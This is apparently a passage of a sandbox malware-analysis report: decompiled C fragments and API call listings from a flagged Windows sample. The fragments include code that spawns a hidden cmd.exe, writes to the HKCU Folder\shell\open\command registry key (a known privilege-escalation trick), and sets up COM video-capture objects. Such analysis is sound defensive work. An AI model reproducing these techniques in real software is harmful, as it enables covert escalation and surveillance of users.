                                                                    								E02D11052( &_v128, 0, 0x48);
                                                                    								_t58 =  *((intOrPtr*)(_t76 + 0x18));
                                                                    								_t121 = _t120 + 0xc;
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
                                                                    								_t49 = E02D22688();
                                                                    								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
                                                                    								if(_t49 != 0) {
                                                                    									_t49 = E02D226A4();
                                                                    									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
                                                                    									if(_t49 != 0) {
                                                                    										_t85 =  *((intOrPtr*)(_t76 + 0x24));
                                                                    										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
                                                                    										if(_t49 >= 0) {
                                                                    											_t60 =  *((intOrPtr*)(_t76 + 0x18));
                                                                    											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
                                                                    											E02D1102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
                                                                    											E02D224EB( &_v200);
                                                                    											_t107 = _a4;
                                                                    											E02D22B2A(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
                                                                    											E02D15CA3(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
                                                                    											_t91 = 7;
                                                                    											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
                                                                    											E02D225D8( *_t76);
                                                                    											_t49 = E02D22688();
                                                                    											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
                                                                    											if(_t49 != 0) {
                                                                    												_t71 =  *((intOrPtr*)(_t76 + 0x18));
                                                                    												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
                                                                    												_t96 =  *((intOrPtr*)(_t76 + 0x24));
                                                                    												_t47 = _t76 + 0x34; // 0x70d05c
                                                                    												_t118 = _t47;
                                                                    												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x2d245c0, _t118);
                                                                    												_t97 =  *_t118;
                                                                    												if(_t97 != 0) {
                                                                    													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t49;
                                                                    			}

                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 02D22D1A
                                                                    • CoCreateInstance.OLE32(02D245A0,00000000,00000001,02D27410,0070D040,?,?), ref: 02D22D32
                                                                    • CoCreateInstance.OLE32(02D245F0,00000000,00000001,02D27400,0070D04C,?,?,02D24580,0070D044,?,?), ref: 02D22D8C
                                                                      • Part of subcall function 02D22A6B: CoCreateInstance.OLE32(02D245E0,00000000,00000001,02D273F0,?,7426B690,00000000,00000000,?,?,02D227B0), ref: 02D22A99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInstance$Initialize
                                                                    • String ID: Grabber$Source$vids
                                                                    • API String ID: 1108742289-4200688928
                                                                    • Opcode ID: 73d72b2c21ec5cf7f51d0fbd204cb1970cbde5612e015299e0208a2fb5328136
                                                                    • Instruction ID: e55e59115a2d45dd0005ac15f10e47502210d918922dfc5d0829cd46000ec4eb
                                                                    • Opcode Fuzzy Hash: 73d72b2c21ec5cf7f51d0fbd204cb1970cbde5612e015299e0208a2fb5328136
                                                                    • Instruction Fuzzy Hash: 86518F71600211AFDB24DF64D888E9A7B66EF59708F114498FD05AF395CB71EC09CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(0070F938,00000000,00000000,?,?,?,?,?,?,?,00414BE0,00420128,00000000,00000000,00000000,00000020), ref: 00414496
                                                                    • __fassign.LIBCMT ref: 00414515
                                                                    • __fassign.LIBCMT ref: 00414534
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00414561
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00414BE0), ref: 00414581
                                                                    • WriteFile.KERNEL32(?,00420128,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00414BE0), ref: 004145BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 0d7e2aa4922963ec6b0bf0500839cb03b98d2c100dcd9a864fef331573b17274
                                                                    • Instruction ID: 0dc69974e0fe8f98dd72314cdf29b93021d07047fc96cb62d40f10d66d68c120
                                                                    • Opcode Fuzzy Hash: 0d7e2aa4922963ec6b0bf0500839cb03b98d2c100dcd9a864fef331573b17274
                                                                    • Instruction Fuzzy Hash: 4F51C371E00249AFDB10CFA8D881AEEBBF5EF49304F14412AE955E7251D734D981CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000000D0), ref: 00406E00
                                                                    • 73CCAC50.USER32(00000000), ref: 00406E11
                                                                    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00406E39
                                                                    • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00406E75
                                                                    • SendMessageA.USER32(00000000,00000189,00000000,?), ref: 00406E9B
                                                                    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00406EBC
                                                                    • SendMessageA.USER32(00000000,00000194,?,00000000), ref: 00406EE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ExtentPoint32Text$Item
                                                                    • String ID:
                                                                    • API String ID: 1222181357-0
                                                                    • Opcode ID: 0836105132f59b06c05857fe69f5962dc125477e940a804e17d94a396800be2d
                                                                    • Instruction ID: eb716e147e04edd7a3654e62f5a02555833c4f89eea1d5a622854399e92414ef
                                                                    • Opcode Fuzzy Hash: 0836105132f59b06c05857fe69f5962dc125477e940a804e17d94a396800be2d
                                                                    • Instruction Fuzzy Hash: 4B31A07550030AEFDB10DF64DC48AEEBBB9EF04701F21413AE916A7291DB35A915CFA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,00000000,?,00000000,?,004035C8,00000000,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00000000), ref: 00403BE4
                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00403C02
                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,0002001F,00000000,00000000,00000000,00000000,?,00000000,?,004035C8,00000000), ref: 00403C55
                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,004035C8,00000000,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00000000,0002001F,00000000), ref: 00403C74
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseCreateHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedA
                                                                    • API String ID: 1765684683-1184998024
                                                                    • Opcode ID: dcc5e64c6b3777e674a55b89a9c114cc423992a87cda2b609c91c920cb1a19ba
                                                                    • Instruction ID: 866be5843eed69adde56d4dbd30a5995d225e9e3e304a0076bdf1e6697d62adb
                                                                    • Opcode Fuzzy Hash: dcc5e64c6b3777e674a55b89a9c114cc423992a87cda2b609c91c920cb1a19ba
                                                                    • Instruction Fuzzy Hash: D8217E32200209ABEF118F59DC44FDB7F69EF08311F10802AF905E6290D735DA61DBA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: ad16ebcd66695fd72900a4f6a2c4c30d4c6a36bdafda2fd599ff06f587a77f11
                                                                    • Instruction ID: aea426922bb4c808b796eaa5bd78a7be2eb3a34cc55e5548ac7260a9838bbbd5
                                                                    • Opcode Fuzzy Hash: ad16ebcd66695fd72900a4f6a2c4c30d4c6a36bdafda2fd599ff06f587a77f11
                                                                    • Instruction Fuzzy Hash: D121F631E01616A7C7229BA48C80A6B7B58AF45760F258176F907B73D0DB38EC09C5DC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,00000000,?,00000000,?,004035AB,00000000,00000000,0002001F,00000000,00000000,?,?), ref: 004050F4
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00405112
                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,?,00000000,?,004035AB,00000000,00000000,0002001F,00000000,00000000), ref: 0040514B
                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,004035AB,00000000,00000000,0002001F,00000000,00000000,?,?), ref: 0040515E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedA
                                                                    • API String ID: 823179699-496252237
                                                                    • Opcode ID: 8fc867ec5f2887fec05e002e632ac6f0428cbb96421cda63c08771dcea01ad63
                                                                    • Instruction ID: a1ed4ca89e83715be12185d689ef569ee4b10421bda04d7049f422d41903f463
                                                                    • Opcode Fuzzy Hash: 8fc867ec5f2887fec05e002e632ac6f0428cbb96421cda63c08771dcea01ad63
                                                                    • Instruction Fuzzy Hash: 93118431B00609FBDB108F59DC44B9BBBA9EB44350F14807AF904EA290D775DD50DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 004113AC: _free.LIBCMT ref: 004113D1
                                                                    • _free.LIBCMT ref: 00411432
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0041143D
                                                                    • _free.LIBCMT ref: 00411448
                                                                    • _free.LIBCMT ref: 0041149C
                                                                    • _free.LIBCMT ref: 004114A7
                                                                    • _free.LIBCMT ref: 004114B2
                                                                    • _free.LIBCMT ref: 004114BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 6c96f07cb90ea9fab43ba37695e38d911ba13b3d7ed7c0729b21a385296e5a21
                                                                    • Instruction ID: 2bdb006d657b78d1340e5f5b3a01fd7fcf3dcd6afd61c4df0191f56696f6549a
                                                                    • Opcode Fuzzy Hash: 6c96f07cb90ea9fab43ba37695e38d911ba13b3d7ed7c0729b21a385296e5a21
                                                                    • Instruction Fuzzy Hash: 0C115471D40708AAE520BBB2EC07FDB77DC5F40704F40482FB7ADAA4A2D67DB5454698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 64%
                                                                    			E02D17948(void* __eflags) {
                                                                    				char _v8;
                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                    				struct _STARTUPINFOA _v100;
                                                                    				CHAR* _t27;
                                                                    
                                                                    				_v8 = 0;
                                                                    				E02D1F7E0( &_v8);
                                                                    				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                                                    				GetWindowsDirectoryA(_t27, 0x104);
                                                                    				E02D1102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
                                                                    				E02D11052( &_v100, 0, 0x44);
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
                                                                    					return E02D1F7B9(_v8);
                                                                    				}
                                                                    				Sleep(0x3e8);
                                                                    				return _v24.dwProcessId;
                                                                    			}

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 02D1796B
                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 02D17979
                                                                    • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 02D17987
                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02D179C1
                                                                    • Sleep.KERNEL32(000003E8), ref: 02D179D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                                                    • String ID: \System32\cmd.exe
                                                                    • API String ID: 2560724043-2003734499
                                                                    • Opcode ID: 8b854b661cbbc441fe7c7d6bfe295bffaeedb0bacafedc44db2bfbeeba681b77
                                                                    • Instruction ID: c4c02dc4a71dc0a614bcd8b09dfe3e0adeb91a2989400de12759817343a58128
                                                                    • Opcode Fuzzy Hash: 8b854b661cbbc441fe7c7d6bfe295bffaeedb0bacafedc44db2bfbeeba681b77
                                                                    • Instruction Fuzzy Hash: F21170B1A40218BFE711A7A4EC86FAF776DEF14744F100425F706B6280DA709E088A75
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D21855(void* __ecx, char* _a4, CHAR* _a8) {
                                                                    				void* _v8;
                                                                    				long _t9;
                                                                    				int _t12;
                                                                    				int _t15;
                                                                    				long _t16;
                                                                    
                                                                    				_t15 = lstrlenA(_a8);
                                                                    				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
                                                                    				if(_t9 == 0) {
                                                                    					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
                                                                    					RegCloseKey(_v8);
                                                                    					if(_t16 == 0) {
                                                                    						_t12 = 1;
                                                                    					} else {
                                                                    						SetLastError(_t16);
                                                                    						goto L2;
                                                                    					}
                                                                    				} else {
                                                                    					SetLastError(_t9);
                                                                    					L2:
                                                                    					_t12 = 0;
                                                                    				}
                                                                    				return _t12;
                                                                    			}








                                                                    0x02d21863
                                                                    0x02d2187a
                                                                    0x02d21882
                                                                    0x02d218a6
                                                                    0x02d218a8
                                                                    0x02d218b0
                                                                    0x02d218b5
                                                                    0x02d218b2
                                                                    0x02d21885
                                                                    0x00000000
                                                                    0x02d21885
                                                                    0x02d21884
                                                                    0x02d21885
                                                                    0x02d21885
                                                                    0x02d2188b
                                                                    0x02d2188b
                                                                    0x02d218b9

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(02D21B3D,02D26056,?,?,02D21B3D,02D26056,?), ref: 02D2185D
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,02D21B3D,02D26056,?), ref: 02D2187A
                                                                    • SetLastError.KERNEL32(00000000,?,?,02D21B3D,02D26056,?), ref: 02D21885
                                                                    • RegSetValueExA.ADVAPI32(?,02D26056,00000000,00000001,02D21B3D,00000000,?,?,02D21B3D,02D26056,?), ref: 02D2189D
                                                                    • RegCloseKey.ADVAPI32(?,?,?,02D21B3D,02D26056,?), ref: 02D218A8
                                                                    Strings
                                                                    • Software\Classes\Folder\shell\open\command, xrefs: 02D21870
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorLastOpenValuelstrlen
                                                                    • String ID: Software\Classes\Folder\shell\open\command
                                                                    • API String ID: 1613093083-2536721355
                                                                    • Opcode ID: 811ce63d6afee9500bd3b114ce5e44934341825bd9143f41abbb81b2e94a42d2
                                                                    • Instruction ID: b4a14ef665fd2fbb881e6e2fd1db25af5148c02ba704c675cbaf4ec106dcd6d6
                                                                    • Opcode Fuzzy Hash: 811ce63d6afee9500bd3b114ce5e44934341825bd9143f41abbb81b2e94a42d2
                                                                    • Instruction Fuzzy Hash: DCF06D35940224FBEF310FA0AC49FDA7BA9AF24754F128550FD06A6241D671CE58DA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0040C445,?,?,0040C40D,00000000,00000000), ref: 0040C4B4
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040C4C7
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040C445,?,?,0040C40D,00000000,00000000), ref: 0040C4EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll$}@
                                                                    • API String ID: 4061214504-912113946
                                                                    • Opcode ID: aba9c075f4428f1833a5047fddeba3888d56f658dcc70b1a49245315991d59be
                                                                    • Instruction ID: 275bddc8ffa87348f51de93e00ed8d184b328067aaea87e7f03a6c3186bd3e18
                                                                    • Opcode Fuzzy Hash: aba9c075f4428f1833a5047fddeba3888d56f658dcc70b1a49245315991d59be
                                                                    • Instruction Fuzzy Hash: F4F08C30A40208FBCB119B91DD59BEEBFB4EB04755F0081BEE805A22A0DF785D41CA99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			E02D17CB7(intOrPtr _a4) {
                                                                    				intOrPtr* _t2;
                                                                    				_Unknown_base(*)()* _t8;
                                                                    				struct HINSTANCE__* _t10;
                                                                    
                                                                    				_t2 =  *0x2e5e0c0;
                                                                    				if(_t2 == 0) {
                                                                    					L2:
                                                                    					_t10 = GetModuleHandleW(L"ntdll.dll");
                                                                    					 *0x2e5e0c0 = GetProcAddress(_t10, "RtlNtStatusToDosError");
                                                                    					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
                                                                    					_t2 =  *0x2e5e0c0;
                                                                    					 *0x2e5e098 = _t8;
                                                                    				} else {
                                                                    					_t8 =  *0x2e5e098;
                                                                    					if(_t8 == 0) {
                                                                    						goto L2;
                                                                    					}
                                                                    				}
                                                                    				if(_t2 != 0 && _t8 != 0) {
                                                                    					return  *0x2e5e098( *_t2(_a4));
                                                                    				}
                                                                    				return _t2;
                                                                    			}






                                                                    0x02d17cba
                                                                    0x02d17cc1
                                                                    0x02d17ccd
                                                                    0x02d17cd9
                                                                    0x02d17ced
                                                                    0x02d17cf8
                                                                    0x02d17cfa
                                                                    0x02d17cff
                                                                    0x02d17cc3
                                                                    0x02d17cc3
                                                                    0x02d17ccb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d17ccb
                                                                    0x02d17d08
                                                                    0x00000000
                                                                    0x02d17d14
                                                                    0x02d17d1b

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,02D186D6,00000000), ref: 02D17CD3
                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 02D17CE1
                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 02D17CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                    • API String ID: 667068680-2897241497
                                                                    • Opcode ID: 524014d0efd6e9fb900e25fc446d77d76bfe43465a3d6aabaa74bb41acbb5b5a
                                                                    • Instruction ID: f199978258c1265db8546a335aa2fde0e2765a77ed2f1a007b23d10b32b56676
                                                                    • Opcode Fuzzy Hash: 524014d0efd6e9fb900e25fc446d77d76bfe43465a3d6aabaa74bb41acbb5b5a
                                                                    • Instruction Fuzzy Hash: C1F03070AD0315ABBB185F66B805A367BA8BF946053544818ED0AD3350D7309DA9CA20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CharNextA.USER32(00000000,?,?,00000000,?), ref: 00405E42
